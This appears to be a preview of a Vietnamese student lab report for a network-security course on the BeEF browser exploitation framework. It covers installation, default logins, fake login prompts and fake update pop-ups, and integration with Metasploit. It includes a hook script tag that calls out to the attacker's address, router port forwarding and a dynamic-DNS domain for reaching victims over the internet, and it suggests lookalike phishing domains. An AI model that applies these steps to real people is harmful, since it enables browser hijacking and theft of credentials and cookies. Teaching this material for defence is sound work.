Tải bản đầy đủ (.pdf) (40 trang)

BÀI BÁO CÁO TÌM HIỂU VỀ CÔNG CỤ BeEF

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (3.8 MB, 40 trang )

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG
KHOA CƠNG NGHỆ THƠNG TIN I

----------

BÀI BÁO CÁO
TÌM HIỂU VỀ CƠNG CỤ BeEF
(Browser Exploitation Framework)

Học phần:

An toàn mạng

Giảng viên: TS. Đặng Minh Tuấn
Sinh viên:

Đỗ Ích Nam

Mã sinh viên: B18DCAT165

Hà Nội 2021

1


MỤC LỤC
LỜI MỞ ĐẦU .................................................................................................................................... 4
DANH MỤC THUẬT NGỮ TIẾNG ANH VÀ TỪ VIẾT TẮT ........................................................ 5
DANH MỤC HÌNH ẢNH .................................................................................................................. 6
1.


Giới thiệu ................................................................................................................................. 7

2.

Cài đặt ...................................................................................................................................... 8

3.

Các tính năng và sử dụng cơ bản .......................................................................................... 11

3.1.

Giao diện ................................................................................................................................ 11

3.2.

Thu thập thông tin (Information Gathering) ........................................................................ 13

3.3.

Social Engineering ................................................................................................................. 13

3.4.

Metasploit Integration (Tích hợp Metasploit) ....................................................................... 15

4.

Lab 1: Hook vào trình duyệt của nạn nhân .......................................................................... 17


4.1.

Cấu hình máy attacker .......................................................................................................... 17

4.2.

Nhận kết nối từ máy nạn nhân .............................................................................................. 19

4.3.

Mở cổng 80/TCP Apache Web Server và 3000/TCP BeEF-XSS .......................................... 21

5.

Lab 2: Phishing - Lừa đảo ..................................................................................................... 26

5.1.

Đăng nhập vào Dịch vụ BeEF ................................................................................................ 26

5.2.

Kết nối trình duyệt mục tiêu.................................................................................................. 27

5.3.

Xem chi tiết ............................................................................................................................ 27

5.4.


Chọn kiểu tấn công ................................................................................................................ 28

6.

Lab 3: Cookie Stealing - Đánh cắp Cookie............................................................................ 31

7.

Lab 4: Khai thác lỗ hổng Trình duyệt qua mạng WAN sửdụng BeEF- XSS và Metasploit
Framework ............................................................................................................................ 32

7.1.

Cấu hình máy Attacker ......................................................................................................... 32

7.2.

Cấu hình Router .................................................................................................................... 35

7.3.

Thực hiện tấn công ................................................................................................................ 35

KẾT LUẬN ...................................................................................................................................... 38

2


DANH MỤC VIDEO THỰC HIỆN DEMO.................................................................................... 39
DANH MỤC TÀI LIỆU THAM KHẢO ......................................................................................... 40


3


LỜI MỞ ĐẦU
Với sự phát triển của xã hội không gian mạng ln là nguồn tài ngun
thơng tin to lớn,có vai trị quan trọng trong sự phát triển kinh tế-chính trị-xã
hội của thế giới.Việt Nam-một nước đang trên đà phát triển mạnh mẽ tuy chưa
có nhiều phát triểnđi đầu về công nghệ nhưng luôn đảm bảo tốc độ theo kịp
với sự phát triển chung của thế giới.
Internet là một nơi khá "nguy hiểm", ln có những thứ rình rập thơng tin
trong máy ta. Các nhà phát triển phần mềm chạy đua với hacker để tìm cho ra
các lỗ hỏng Zero-day nguy hiểm, đặc biệt là đối với các hệ điều hành cũ
khơng cịn được hỗ trợ như Windows XP thì đó lại càng là một vấn đề to lớn.
Các phương thức hacking và các công cụ ngày càng nhiều, và có khi nó cịn
"free". BeEF là một cơng cụ cho phép ta tấn cơng qua trình duyệt web của nạn
nhân, có thể là Chromium, Google Chrome hay Firefox.
Trong bài báo cáo này chúng ta sẽ tìm hiểu một góc nhỏ của vấn đề đó :
một số cơng cụ framwork hay cụ thể hơn là BeEF .Vậy công cụ này được sử
dụng và được ứng dụng như nào những nội dung đó sẽ có trong bài báo cáo
dưới đây.

4


DANH MỤC THUẬT NGỮ TIẾNG ANH VÀ TỪ VIẾT TẮT
Từ viết tắt

Thuật ngữ Tiếng Anh


Thuật ngữ Tiếng Việt

BEEF

Browser Exploitation
Framework

Bộ công cụ tấn công hệ thống

HTTP

Hypertext Transfer
Protocol

Giao thức Truyền tải Siêu Văn Bản

IPS

Internet Service Provider

Nhà cung cấp dịch vụ mạng

LAN

Local Area Network

Mạng máy tính cục bộ

TCP


Transmission Control
Protocol

Giao thức điều khiển truyền vận

WAN

Wide Area Network

Mạng diện rộng

XSS

Cross Site Scripting

Một loại lỗ hổng bảo mật

Cookie

Tập tin gửi đến máy người dùng và
được lưu lại thơng qua trình duyệt

Metasploit Framework

Mơi trường để kiểm tra, tấn công và
khai thác lỗi của các server

Metasploit Integration

Bộ công cụ khai thác lỗ hổng


Social Engineering

Phương pháp tấn công lừa đảo phi kỹ
thuật

Social Engineering Google
phishing

Tấn công kỹ thuật thực hiện qua
Google

5


DANH MỤC HÌNH ẢNH
Hình 1: Cách khởi động BeEF trên Kali Linux ...................................................................................... 8
Hình 2: Màn hình làm việc BEEF sau khi khởi động .............................................................................. 9
Hình 3:UI đăng nhập của BeEF trên trang web ..................................................................................... 9
Hình 4: File configure.yaml để thay đổi thơng tin login ....................................................................... 10
Hình 5:Màn hình UI BEEF sau khi đăng nhập trên trang web ............................................................. 10
Hình 6: Giao diện UI BeEF ................................................................................................................. 11
Hình 7 Các chức năng chính mà BeEF hỗ trợ....................................................................................... 12
Hình 8: Thơng tin thu thập được từ máy nạn nhân................................................................................ 13
Hình 9: Giả mạo giao diện đăng nhập mạng xã hội Facebook ............................................................. 14
Hình 10: Giả mạo giao diện update của Adobe .................................................................................... 15
Hình 11: Khai thác một lỗ hổng trong bảng SING trong phiên bản 8.2.4 và 9.3.4 của Adobe Reader ... 16
Hình 12: Kết hợp BeEF với Metasploit để khai thác lỗ hổng firefox .................................................. 16
Hình 13: Khai thác thông tin của máy nạn nhân bằng Metasploit ........................................................ 17
Hình 14: Xác định địa chỉ ip của máy Attacker .................................................................................... 17

Hình 15: Khởi động BEEF-XSS .......................................................................................................... 18
Hình 16: Script tấn công được chèn vào Script của trang web .............................................................. 19
Hình 17: Khởi động apache serv .......................................................................................................... 19
Hình 18: Giao diện giả mạo trang tìm kiếm Bing và thơng tin địa chỉ IP của máy nạn nhân .................. 20
Hình 19: Thông tin thu thập được từ máy nạn nhân .............................................................................. 21
Hình 20: Giao diện của Defualt Gateway Router.................................................................................. 22
Hình 21: Mở cổng 3000/TCP trên giao diện Router ............................................................................. 23
Hình 22: Đăng kí tên miền trên Router ................................................................................................ 24
Hình 23: Thơng báo đăng kí tên miền thành công trên NoIP Manager .................................................. 25
Hình 24: Màn hình đăng nhập vào dịch vụ BEEF ................................................................................ 26
Hình 25: Giao diện bắt đầu của dịch vụ sau khi đăng nhập thành công ................................................. 27
Hình 26: Thông tin từ máy chủ nạn nhân thu thập được ....................................................................... 28
Hình 27: Tab command trên dịch vụ .................................................................................................... 28
Hình 28: Chọn kiểu tấn công Phishing trên dịch vụ .............................................................................. 29
Hình 29: Giao diện lừa đảo đăng nhập giả mạo dịch vụ gmail của google ............................................ 30
Hình 30: Thông tin tài khoản mật khẩu thu thập được từ nạn nhân ....................................................... 30
Hình 31: Website tồn tại lỗ hổng XSS ................................................................................................. 31
Hình 32: Thực hiện gửi request với payload......................................................................................... 31
Hình 33: Cookie thu thập được từ máy nạn nhân.................................................................................. 32
Hình 34: Màn hình khởi chạy Metasploit Framework .......................................................................... 32
Hình 35: Sử dụng kịch bản tấn công Browser Autopwn ....................................................................... 33
Hình 36: Thực hiện cấu hình cho cho Metasploit ................................................................................. 33
Hình 37: Chuyển cổng Metasploit Framework sang 9090 .................................................................... 34
Hình 38: Mở cổng dịch vụ 4442-4447/TCP và 9090/TCP Metasploit ................................................... 35
Hình 39: Tạo Invisible Iframe trên máy nạn nhân ................................................................................ 35
Hình 40: Địa chỉ IP máy nạn nhân ....................................................................................................... 36
Hình 41: Thực hiện lắng nghe máy nạn nhân ....................................................................................... 36

6



1. Giới thiệu
BeEF (Browser Exploitation Framework) là một bộ công cụ tấn công hệ thống.
Bộ công cụ này được tạo ra bởi một nhóm lập trình viên, dẫn đầu là Wade Alcorn.
Khác với Metasploit Framework, BeEF được sử dụng tấn cơng vào các trình
duyệt. Tuy nhiên trong một số trường hợp đặc biệt, BeEF có thể được dùng kết
hợp với Metasploit để bắt đầu một cuộc tấn công đặc biệt.
Được xây dựng trên nền tảng Ruby on Rails, BeEF được thiết kế để khai thác
và kiểm thử các lỗ hổng trên trình duyệt. BeEF là nền tảng rất tốt để kiểm thử lỗ
hổng XSS (Cross Site Scripting) và các loại tấn công injection khác. BeEF bắt
đầu bằng tạo ra một trang đường link, sau đó hacker gửi đường link cho người
dùng. Tạo ra link này bằng BeEF, có thể sử dụng BeEF cài đặt sẵn trên Kali Linux.
Khi người dùng nhấn vào đường link này, kẻ tấn cơng có thể theo dõi mục tiêu
và thậm chí chạy các modules để xâm nhập vào hệ thống hay thu thập thêm thông
tin về người dùng. Nó cịn có thể qt hệ thống mạng của máy tính mục tiêu, chụp
ảnh màn hình, theo dõi bàn phím hoặc chạy các trang web giả mạo để lấy thông
tin người dùng của nạn nhân.

7


2. Cài đặt
Trên Kali, BeEF có thể được cài bằng câu lệnh:
sudo apt install BeEF-xss
Sau khi cài, truy cập vào Menu -> BeEF -> BeEF start

Hình 1: Cách khởi động BeEF trên Kali Linux

8



Hình 2: Màn hình làm việc BEEF sau khi khởi động

Sau đó ta sẽ được chuyển đến giao diện Web UI của BeEF tại địa chỉ
http://127.0.0.1:3000/ui/authentication như hình. Đây là địa chỉ localhost thế
nên đối với các máy tính kết nối từ ngoài vào BeEF, cần thay địa chỉ
127.0.0.1 thành IP của máy để kết nối tới WEB UI.
Đây là giao diện Web UI của BeEF khi cài đặt xong:

Hình 3:UI đăng nhập của BeEF trên trang web

9


Trong lần đăng nhập đầu tiên thì thơng tin đăng nhập sẽ là: user: BeEF, password:
BeEF. Sau đó có thể đổi mật khẩu nếu muốn.
Vào File System -> usr -> share -> BeEF-xss -> config.yaml và thực hiện đổi user,
passwd

Hình 4: File configure.yaml để thay đổi thông tin login

Sau khi đăng nhập thành cơng

Hình 5:Màn hình UI BEEF sau khi đăng nhập trên trang web

10


3. Các tính năng và sử dụng cơ bản
3.1. Giao diện


Hình 6: Giao diện UI BeEF

Đây là giao diện cơ bản của BeEF:
- Hooked browsers: Những trình duyệt đã kết nối tới Hook
- Home tab: Trang chủ
- Log tab: Nơi ghi nhật ký hoạt động
- Offline browsers: Những trình duyệt đã kết nối tới Hook nhưng sau thoát
ra.
Khi click vào một browser thì sẽ thấy BeEF hỗ trợ khá nhiều các chức năng
khác nhau thông qua tab command

11


Hình 7 Các chức năng chính mà BeEF hỗ trợ

Trong bài báo cáo này sẽ giới thiệu về hai chức năng chính của BeEF đó là:
 Social Enigeering
 Metasploit (Sử dụng BeEF tích hợp với Metasploit)

12


3.2. Thu thập thông tin (Information Gathering)

Hình 8: Thông tin thu thập được từ máy nạn nhân

Sau khi Hook vào trình duyệt của nạn nhân, BEEF có thể thu thập những
thơng tin quan trọng sau:

- Browser Name: Tên của trình duyệt
- Browser Version: Phiên bản trình duyệt
- Browser User Agent: User Agent của trình duyệt
- Plugins (including Java, ActiveX, VBS, Flash etc): Các plugin được
cài, đây là nơi dễ khai thác lỗ hổng nhất
- Has Flash: Có cài Flash Player không (Flash luôn được coi như
“thảm họa bảo mật” của trình duyệt)

3.3. Social Engineering
BEEF hỗ trợ một số loại tấn công Social Engineering:
- The Pretty Theft: In ra một cửa sổ yêu cầu người dùng nhập username
và password, có thể giả mạo một số trang web nổi tiếng như Facebook
ở hình dưới:

13


Hình 9: Giả mạo giao diện đăng nhập mạng xã hội Facebook

- The Simple Hijacker: Tạo ra popup khi người dùng nhấn vào link của
trình duyệt
- Clippy: Tạo ra màn hình giả mạo yêu cầu người dùng cập nhật trình
duyệt
- Redirect Browser: Chuyển hướng trang web sang một nội dung khác
BEEF cịn có thể cài đặt mã độc vào trình duyệt của nạn nhân:
Fake Flash Update: Giả mạo yêu cầu người dùng cập nhật Flash. Sau khi
người dùng cài đặt, BEEF gần như đã nắm được trình duyệt của nạn nhân, có
thể thu thập cookie, chèn BEEF vào các tab, chạy mã javascript, chụp ảnh màn
hình v.v.


14


Hình 10: Giả mạo giao diện update của Adobe

3.4. Metasploit Integration (Tích hợp Metasploit)
Metasploit là bộ cơng cụ khai thác lỗ hổng hiệu quả nhất và lớn nhất. BEEFhỗ
trợ tích hợp với Metasploit và có thể thực thi rất nhiều loại tấn công chỉ với vài
cú click chuột đơn giản. Hacker có thể lấy shell, chiếm quyền điều khiển hệ
thống.

15


Hình 11: Khai thác một lỗ hổng trong bảng SING trong phiên bản 8.2.4 và 9.3.4 của Adobe Reader

Hình 12: Kết hợp BeEF với Metasploit để khai thác lỗ hổng firefox

16


Hình 13: Khai thác thông tin của máy nạn nhân bằng Metasploit

4. Lab 1: Hook vào trình duyệt của nạn nhân
4.1. Cấu hình máy attacker
Xác định địa chỉ IP của máy:
Bước đầu tiên cần xác định địa chỉ lớp C (hay cịn gọi là địa chỉ mạng LAN)
trên máy tính của Attacker, sử dụng lệnh ifconfig

Hình 14: Xác định địa chỉ ip của máy Attacker


Xác định được địa chỉ IP LAN của máy Attacker là 192.168.0.109 trên
Interface eth0.

17


Khởi chạy BeEF-XSS:
Khởi động BeEF-XSS với lệnh beef-xss start với quyền root.

Hình 15: Khởi động BEEF-XSS

Tạo Website giả mạo:
Nội dung trang web không quan trọng, chỉ cần làm sao để lừa được người
dùng truy cập và duy trì kết nối đủ lâu để thực hiện hành vi tấn công.
Quan trọng nhất là đoạn Script
<script src="http://192.168.0.109:3000/hook.js"></script>

18


Hình 16: Script tấn công được chèn vào Script của trang web

Khởi chạy dịch vụ Apache:
Sử dụng lệnh service apache2 start và cũng yêu cầu quyền root
để thực thi.

Hình 17: Khởi động apache serv

4.2. Nhận kết nối từ máy nạn nhân

Nạn nhân truy cập vào địa chỉ 192.168.0.109 và nhận được một trang
web giả mạo có giao diện đủ để đánh lừa người dùng, ở đây chỉ sử dụng
giao diện mặc định của file index.hmtl của Apache2.
địa chỉ IP của máy nạn nhân là 192.168.0.103

19


Hình 18: Giao diện giả mạo trang tìm kiếm Bing và thông tin địa chỉ IP của máy nạn nhân

20


Quay lại với BeEF Control Panel, ở mục Online Browsers đã thấy tín hiệu
kết nối với máy 192.168.0.103sử dụng trình duyệt nhân Chromium và hệ
điều hành Window.

Hình 19: Thông tin thu thập được từ máy nạn nhân

4.3. Mở cổng 80/TCP Apache Web Server và 3000/TCP BeEF-XSS
Truy cập vào Router:
Thông thường, địa chỉ của Router chính là địa chỉ Gateway khi xem thông tin
về Interface mạng (vd 192.168.1.1, 192.168.0.1, 10.170.1.1, ...).
Thực hiện cấu hình Router để mở cổng dịch vụ 80/TCP cho máy Attacker có
địa chỉ là 192.168.0.109.

21


Hình 20: Giao diện của Defualt Gateway Router


22


Tiếp theo, mở cổng dịch vụ 3000/TCP cho máy Attacker có địa chỉ là
192.168.0.109

Hình 21: Mở cổng 3000/TCP trên giao diện Router

Có thể cổng mặc định trên từng phiên bản sẽ khác nhau, ví dụ Apache là cổng81
hoặc BeEF là cổng 3001, việc đó khơng quan trọng, quan trọng là PHẢI mở cổng
(PORT) trên Router cho máy tính Client GIỐNG với cổng Apache hay BeEF đã
mở trên máy tính Client.
Cấu hình DNS trỏ tên miền về IP Router:
IP của Router là một Public IP, nó là địa chỉ IP dùng để giao tiếp với thế giới
Internet.
Việc trỏ tên miền về địa chỉ Public IP này có 2 lợi ích:
- Khắc phục được tình trạng IP động: Thơng thường, nhà cung cấp dịch
vụ mạng (IPS) sẽ cung cấp cho người dùng một địa chỉ IP, và địa chỉ
nàykhông cố định (nếu muốn cố định thì phải đăng ký mất phí) .

23


 Vậy nên địa chỉ IP sẽ bị thay đổi sau mỗi lần khởi động lại Router (vd gặp
sự cố về nguồn điện hoặc do Router bị quá tải), và việc này sẽ khiến cho pha
Duy trì kết nối trong kịch bản Tấn công mạng bị gián đoạn.
- Dễ nhớ: Không chỉ dễ nhớ, việc sử dụng tên miền hợp lí sẽ dễ dàng để
thực hiện hành vi lừa đảo hơn. Hacker có thể sử dụng tên miền gần giống
với cáctrang được giả mạo (vd vppbank.vn, facebookk.com, ...) để lừa

nạn nhân truy cập vào và khiến nạn nhân tưởng rằng mình đang truy cập
web site hợppháp.
Trong kịch bản này sử dụng dịch vụ tên miền miễn phí của NoIP. Tên miền
đăng ký với NoIP là: minhnq22.ddns.net.

Hình 22: Đăng kí tên miền trên Router

24


Hình 23: Thơng báo đăng kí tên miền thành cơng trên NoIP Manager

Trên NoIP Manager đã thông báo trỏ tên miền thành công.

25


×